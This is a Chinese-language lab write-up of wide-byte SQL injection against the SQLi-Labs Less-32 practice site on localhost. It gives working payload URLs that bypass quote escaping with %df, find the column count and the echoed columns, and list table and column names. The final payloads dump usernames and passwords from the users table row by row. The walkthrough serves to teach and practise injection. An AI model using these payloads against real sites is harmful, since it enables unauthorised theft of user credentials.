宽字节注入

1.访问SQLi-Labs网站

访问Less-32，并根据网页提示给定一个GET参数

2.寻找注入点

http://127.0.0.1/sqli-labs/Less-32/?id=1'

 运行后正常显示用户名和密码，但页面下方提示 ' 前被加上了 \

http://127.0.0.1/sqli-labs/Less-32/?id=1%df'

 运行后发生报错！

http://127.0.0.1/sqli-labs/Less-32/?id=1%df' --+

运行后正常显示！

由上述结果可以判断，网站存在字符型注入点，且有宽字节注入漏洞!

3.判断网站查询的字段数

http://127.0.0.1/sqli-labs/Less-32/?id=1%df' order by 1 --+

正常显示！

 ...

 ...

http://127.0.0.1/sqli-labs/Less-32/?id=1%df' order by 4 --+

报错！

 由上述结果可以判断，网站查询的字段数为3

4.判断网站的回显位置

http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,2,3 --+

 执行的结果是:2号位和3号位可以回显!

5.获取网站当前所在数据库的库名

http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,2,database() --+

6.获取数据库security的全部表名

http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479 --+

注意: payload 如果写成...table_schema= 'security'，此处的单引号也会被加上转义符而无法带入执行，这里需要将字符串security 转换成16进制编码,即ex7365637572697479,其中ex73、0x65 、0x63、0x75、0x72、0x69、0x74 、0x79分别是小写字母s 、e、 c 、u、 r、i、 t、y的16进制编码。

 显示结果中，有一个名为users的表，这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x7365637572697479 and table_name=0x7573657273 --+

注意:同上，0x7365637572697479、0x7573657273分别是字符串security 、 users的16进制编码。

 显示结果，users表中有id、 username和 password三个字段。

8.获取users表id、username和password字段的全部值

由于users表中存放着多组用户名和密码的数据，而每次只能显示一组数据，我们可以通过limit M,N的方式逐条显示，如

1)显示第一组数据

http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,2,concat_ws(0x2c,id,username,password) from security.users limit 0,1 --+

注意：0x2c是逗号的16进制编码

2）显示第二组数据

http://127.0.0.1/sqli-labs/Less-32/?id=1%df' and 1=2 union select 1,2,concat_ws(0x2c,id,username,password) from security.users limit 1,1 --+

 以此类推，可通过修改limit后面的参数，将users表中存放的所有用户信息全部暴露出来。